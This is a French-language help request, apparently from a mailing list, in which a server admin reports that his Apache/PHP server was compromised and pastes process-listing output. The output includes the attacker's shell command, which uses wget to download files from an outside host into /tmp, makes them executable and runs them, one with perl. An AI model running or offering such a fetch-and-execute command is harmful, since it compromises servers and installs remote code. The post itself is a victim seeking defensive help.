Hello folks,
Décidément... Cette fois ci un hacker réussit à faire exécuter un shell à
mon serveur http qui vient d'être mis à jour. Ce shell télécharge un
fichier, le rend exécutable, le fait exécuter par perl.
Heureusement, le programme en question cherche à écouter le port 8118 qui
est bloqué sur ma machine.
Mais comment diable peut-il faire exécuter un shell à mon serveur http ???
Voilà ce que me sort un ps axuwww :
9022 ? S 0:00 \_ httpd2 -f /etc/httpd/conf/httpd2.conf
-DAPACHE2 -DHAVE_PHP4 -DHAVE_PYTHON -DHAVE_SUEXEC -DHAVE_ACCESS
-DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_ANON -DHAVE_AUTH_DBM
-DHAVE_AUTH_DIGEST -DHAVE_AUTH -DHAVE_AUTOINDEX
-DHAVE_CASE_FILTER_IN-DHAVE_CASE_FILTER -DHAVE_CERN_META -DHAVE_CGID
-DHAVE_CGI -DHAVE_CHARSET_LITE -DHAVE_DAV_FS -DHAVE_DAV -DHAVE_DEFLATE
-DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ENV -DHAVE_EXPIRES -DHAVE_EXT_FILTER
-DHAVE_HEADERS -DHAVE_IMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG
-DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME_MAGIC -DHAVE_MIME
-DHAVE_NEGOTIATION -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING
-DHAVE_STATUS -DHAVE_UNIQUE_ID -DHAVE_USERDIR -DHAVE_USERTRACK
-DHAVE_VHOST_ALIAS
9039 ? S 0:00 | \_ sh -c cd /tmp;wget
www58.mediaserve.net/.dump/httpd;chmod +x httpd;./httpd;cd /tmp;wget
www58.mediaserve.net/.dump/httpd.txt;chmod +x httpd.txt;perl httpd.txt
9047 ? S 0:01 | \_ perl httpd.txt
Any hints ?
Merci
-- Jean-Marc
